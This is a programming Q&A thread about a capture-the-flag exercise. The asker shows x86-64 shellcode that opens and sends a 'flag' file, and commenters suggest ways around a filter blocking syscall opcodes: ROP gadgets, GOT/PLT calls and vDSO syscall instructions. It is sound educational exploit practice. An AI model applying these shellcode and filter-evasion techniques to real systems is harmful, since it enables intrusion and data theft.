# How to read a file using shellcode without explicitly mentioning syscall (0x0f05) with write permissions disabled?

Tags: linux, assembly, x86-64, system-calls, shellcode

I'm working on a ctf-like challenge and it is filtering my shellcode to make sure I don't have the hex value encodings of the syscall, sysenter and int instructions 0x0f05 0x0f34 and 0x80cd respectively. It has also disabled write permissions. I have a shellcode that can open a file which uses the sendfile system call but it includes the syscall instruction. The previous challenge was the same but with write permissions enabled. I successfully used a self-modifying shellcode in that challenge to get the flag.

This is the assembly code (with syscall) I used to read the file "flag" (GAS intel syntax):

```
    .globl _start

_start:
    .intel_syntax noprefix
    mov     rbx, 0x67616c66
    push    rbx
    mov     rax, 2
    mov     rdi, rsp
    mov     rsi, 0
    syscall

    mov     rdi, 1
    mov     rsi, rax
    mov     rdx, 0
    mov     r10, 1000
    mov     rax, 40
    syscall

    mov     rax, 60
    syscall
```

I have been searching for an alternative way to do a system call in Linux for the past day but it seems impossible (I'm a newbie to assembly).

I read about an alternative way to do system calls by [*Call Gates* method](https://en.wikipedia.org/wiki/Call_gate_(Intel)), but it seems to rely on the [*Global Descriptor Table*](https://en.wikipedia.org/wiki/Global_Descriptor_Table) and I don't think I can access that due to ASLR (Correct me if I'm wrong).

I'm not necessarily looking for an exact answer but just looking for some help understanding a way I can do a system call in this conditions.

Comment: It may be possible to use code gadgets in the program you're attacking. Find a syscall instruction and jump to it, ideally choosing one that returns control flow to your code after the syscall.

Comment: Thanks. I just found out that ASLR is disabled in it. So maybe I can use ROP to achieve it.

Comment: BTW, you can `push 0x67616c66`.  That 64-bit constant fits in a 32-bit sign-extended immediate.  Also, I find it amusing that your shellcode is filtered for `0x0f05` and similar patterns, but not for `0` bytes.  (Although I guess that's possible in real life; some exploits involve things other than C string overflows, e.g. newline 0xa or other whitespace with scanf)

Comment: Are the GOT or PLT entries for `open` and `read` libc functions at a known address?  You could just `call` them with an indirect call to their absolute addresses.

Comment: I understand you’re on Linux, so I guess you can use the [auxiliary vector](https://lwn.net/Articles/519085/) to find the [vDSO](https://man7.org/linux/man-pages/man7/vdso.7.html) which eventually contains `syscall` instructions (as a fallback I think).

Comment: All of the above comments are pretty good suggestions. You should definitely see which one fits best your case and post a self-answer when you solve the challenge!